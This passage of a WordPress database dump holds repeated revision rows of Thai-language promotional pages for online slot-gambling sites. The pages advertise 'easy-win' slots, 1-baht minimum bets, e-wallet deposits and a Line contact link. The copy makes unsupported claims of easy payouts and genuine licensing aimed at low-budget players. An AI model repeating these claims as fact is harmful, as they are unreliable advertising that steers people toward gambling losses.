</b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:16:09','2026-02-26 19:16:09','',44,'https://amb18slot.com/?p=389',0,'revision','',0),(390,3,'2026-02-26 19:16:09','2026-02-26 19:16:09','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างของ AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>AMB18 แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:16:09','2026-02-26 19:16:09','',44,'https://amb18slot.com/?p=390',0,'revision','',0),(391,3,'2026-02-26 19:17:23','2026-02-26 19:17:23','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-26 19:17:23','2026-02-26 19:17:23','',16,'https://amb18slot.com/?p=391',0,'revision','',0),(392,3,'2026-02-26 19:17:23','2026-02-26 19:17:23','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-26 19:17:23','2026-02-26 19:17:23','',16,'https://amb18slot.com/?p=392',0,'revision','',0),(393,3,'2026-02-26 19:17:24','2026-02-26 19:17:24','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp\" alt=\"ทดลองเล่นสล็อต\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" 